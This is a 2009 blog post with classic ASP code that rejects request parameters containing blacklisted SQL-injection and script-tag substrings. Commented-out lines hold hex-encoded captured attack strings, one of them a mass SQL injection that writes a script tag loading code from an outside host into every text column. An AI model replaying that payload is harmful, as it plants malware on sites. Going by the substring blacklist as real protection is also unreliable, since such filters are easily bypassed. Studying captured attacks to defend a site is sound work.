Tuesday, January 6, 2009

detect Filter All HTTP GET and POST data using a black list

Filter All HTTP GET and POST data using a black list



<%
'str = "0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
'str = "0x3B7570646174652063776E5F6D656D62657220736574206E616D653D2767616E272077686572652069643D"
'str = trim0x( str )
'
'Response.Write decimalToChar( str )
'
'Response.Write "
====
"

'Response.Write Request.QueryString() & "
"
'Response.Write "====
"
' 

'Response.Write Request.ServerVariables("QUERY_STRING") & "<br>=====
"



strBlackList = Array( ";declare", "; declare", ";%20declare", _
       ";set", "; set", ";%20set", _
       ";exec", "; exec", ";%20exec", _
       "%20set", _
       "varchar", _
       "0x44", _
       "<script", _
       "%3Cscript", _
       "3C736372697074", _
       "</script>", _
       "%3C/script", _
       "src=" _
     )

For b = 0 To UBound(strBlackList) Step 1
  ' ### Note: Instead of parsing the string using Request.QueryString, get the whole query string usin g Request.Servervariables("QUERY_STRING") because the a request in the following format will not be parsed:
  ' ### <form method="post" action="post.asp?PageID=123;Declare @a;Set @=123;Exec(@);">
  ' ### </form>
 For Each item In Request.QueryString()
  queryStr = Request.QueryString(item)
  If InStr(1, queryStr, strBlackList(b), 1) > 0 Then
   Response.Write "NO!!"
   Response.End
  End If
  'Execute( "my_" & item & " = """ & replace( Request.QueryString(item), "'", "''") & """" )
 Next

 For Each item In Request.Form()
  formStr = Request.Form(item)
  If InStr(1, formStr, strBlackList(b), 1) > 0 Then
   Response.Write "NO!!"
   Response.End
  End If
  'Execute( "my_" & item & " = """ & replace( Request.Form(item), "'", "''") & """" )
 Next
Next



Function URLDecode(str) 
 str = Replace(str, "+", " ") 
 For i = 1 To Len(str) 
  sT = Mid(str, i, 1) 
  If sT = "%" Then 
   If i+2 < Len(str) Then 
    sR = sR & _ 
     Chr(CLng("&H" & Mid(str, i+1, 2))) 
    i = i+2 
   End If 
  Else 
   sR = sR & sT 
  End If 
 Next 
 URLDecode = sR 
End Function 


Function charToHex( str )
 strResult = ""
 leng = len(str)
 For i = 1 To leng Step 1
  strResult = strResult & hex( asc( mid( str, i, 1) ) )
 Next
 charToHex = strResult
End Function

Function charToDecimal( str )
 strResult = ""
 leng = len(str)
 For i = 1 To leng Step 1
  strResult = strResult & asc( mid( str, i, 1) )
 Next
 charToDecimal = strResult
end Function

Function trim0x(str)
 strTmp = mid(str, 1, 2)
 if strTmp = "0x" or strTmp = "0X" then
  str = mid( str, 3)
 end if
 trim0x = str
End Function



Function decimalToChar( strDec )
 strResult = ""
 count = -1
 leng = len(strDec)/2
 For i = 1 To leng Step 1
  count = count + 2
  strResult = strResult & Chr( hexToDecimal( Mid( strDec, count, 2 ) ) )
 next
 decimalToChar = strResult
End Function

Function hexToDecimal(strHex)
  dim lngResult
  dim intIndex
  dim strDigit
  dim intDigit
  dim intValue

  lngResult = 0
  for intIndex = len(strHex) to 1 step -1
    strDigit = mid(strHex, intIndex, 1)
    intDigit = instr("0123456789ABCDEF", ucase(strDigit))-1
    if intDigit >= 0 then
      intValue = intDigit * (16 ^ (len(strHex)-intIndex))
      lngResult = lngResult + intValue
    else
      lngResult = 0
      intIndex = 0 ' stop the loop
    end if
  next

  hexToDecimal = lngResult
End Function
%>
Posted by Jun Hsieh at 3:02 PM
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)